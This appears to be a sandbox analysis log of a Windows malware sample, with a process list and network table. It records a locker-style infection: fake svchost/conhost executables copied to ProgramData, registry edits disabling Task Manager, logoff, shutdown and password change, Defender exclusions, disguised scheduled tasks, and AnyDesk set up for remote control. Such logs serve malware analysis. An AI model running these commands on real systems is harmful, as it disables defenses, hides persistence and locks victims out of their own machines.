"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5864,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5324,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6272,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6416,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6652,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7020,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7184,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:8
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=7348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7368,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7676 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7640,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:8
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=7976,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=8104,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=8136 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x300
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6064,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:8
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv Zaa7TMQPjES0SaK7eWRoQg.0.1
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\timeout.exe
timeout /T 2 /NOBREAK
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=8576,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| US | 212.102.60.111:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-79bdf984.net.anydesk.com | udp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.60.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.165.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| NL | 2.18.121.23:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.68.209.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.45.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 104.244.42.130:443 | api.x.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| GB | 199.232.56.158:443 | video.twimg.com | tcp |
| PL | 93.184.220.70:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | 200.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.220.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| BE | 2.17.107.123:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.107.17.2.in-addr.arpa | udp |
| BE | 2.17.107.123:443 | www.bing.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| BE | 88.221.83.202:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 202.83.221.88.in-addr.arpa | udp |
| US | 212.102.60.111:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | appleid.cdn-apple.com | udp |
| US | 8.8.8.8:53 | appleid.cdn-apple.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| BE | 104.68.84.171:443 | appleid.cdn-apple.com | tcp |
| US | 8.8.8.8:53 | relay-98c428ee.net.anydesk.com | udp |
| GB | 195.181.165.154:443 | relay-98c428ee.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| GB | 142.250.200.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 171.84.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.165.181.195.in-addr.arpa | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 104.16.5.5:443 | assets.sb-cd.com | udp |
| GB | 89.187.167.6:443 | c.ptgncdn.com | tcp |
| GB | 89.187.167.6:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 104.16.5.5:443 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | flagb93361.spankbang.com | udp |
| US | 104.19.130.98:443 | flagb93361.spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | udp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| GB | 195.181.164.19:443 | static.javhd.com | tcp |
| GB | 195.181.164.16:443 | a.magsrv.com | tcp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 74.117.182.35:443 | stats.postgen.com | tcp |
| US | 74.117.182.35:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 74.117.182.35:443 | stats.postgen.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.245:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| NL | 95.211.229.245:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | udp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 104.18.53.225:443 | video.ktkjmp.com | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.11.106:443 | img.strpst.com | udp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 104.18.40.50:443 | go.xxxviijmp.com | udp |
| US | 8.8.8.8:53 | vstream-13.sb-cd.com | udp |
| US | 8.8.8.8:53 | vstream-13.sb-cd.com | udp |
| DE | 212.102.56.137:443 | vstream-13.sb-cd.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | 19.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.182.117.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.229.211.95.in-addr.arpa | udp |
